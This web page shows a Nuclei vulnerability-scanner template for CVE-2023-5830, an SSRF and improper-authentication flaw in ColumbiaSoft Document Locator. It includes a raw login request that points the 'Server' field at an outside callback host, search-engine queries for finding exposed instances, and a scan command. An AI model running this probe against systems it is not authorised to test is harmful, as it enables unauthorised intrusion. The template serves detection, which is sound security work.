ColumbiaSoft DocumentLocator - Improper Authentication

ID: CVE-2023-5830

Severity: critical

Author: Gonski

Tags: cve,cve2023,ssrf,unauth,columbiasoft,intrusive,webtools,documentlocator

Description

Instances of ColumbiaSoft’s Document Locator prior to version 7.2 SP4 and 2021.1 are vulnerable to an Improper Authentication/SSRF vulnerability. This template identifies vulnerable instances of the ColumbiaSoft Document Locater application by confirming external DNS interaction/lookups by modifying the value of the client-side SERVER parameter at /api/authentication/login.

YAML Source

id: CVE-2023-5830

info:
  name: ColumbiaSoft DocumentLocator - Improper Authentication
  author: Gonski
  severity: critical
  description: |
    Instances of ColumbiaSoft's Document Locator prior to version 7.2 SP4 and 2021.1 are vulnerable to an Improper Authentication/SSRF vulnerability. This template identifies vulnerable instances of the ColumbiaSoft Document Locater application by confirming external DNS interaction/lookups by modifying the value of the client-side SERVER parameter at /api/authentication/login.
  impact: |
    An attacker could exploit this vulnerability to gain unauthorized access to sensitive information.
  remediation: |
    Upgrade to a patched version of ColumbiaSoft DocumentLocator to fix the improper authentication issue.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-5830
    - https://vuldb.com/?ctiid.243729
    - https://github.com/advisories/GHSA-j89v-wm7x-4434
    - https://vuldb.com/?id.243729
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-5830
    cwe-id: CWE-287
    epss-score: 0.00427
    epss-percentile: 0.74333
    cpe: cpe:2.3:a:documentlocator:document_locator:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: documentlocator
    product: document_locator
    shodan-query:
      - 'title:"Document Locator - WebTools"'
      - http.title:"document locator - webtools"
    fofa-query: title="document locator - webtools"
    google-query: intitle:"document locator - webtools"
  tags: cve,cve2023,ssrf,unauth,columbiasoft,intrusive,webtools,documentlocator

http:
  - raw:
      - |
        @timeout: 20s
        POST /api/authentication/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json;charset=UTF-8
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}

        {
          "LoginType":"differentWindows",
          "User":"{{randstr}}",
          "Password":"{{rand_base(5, "abc")}}",
          "Domain":"{{randstr}}",
          "Server":"{{interactsh-url}}",
          "Repository":"{{randstr}}"
        }

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: body
        words:
          - '"Authorized":false'
# digest: 4a0a004730450221009edfab8d2959d534c04913c8a2e588e226c9e0218ff3cef6fd6894e1017c440102202dc6c66569ea9894460eba538627197051602b57c15a4305e34c87c9ff46b080:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-5830.yaml"

View on Github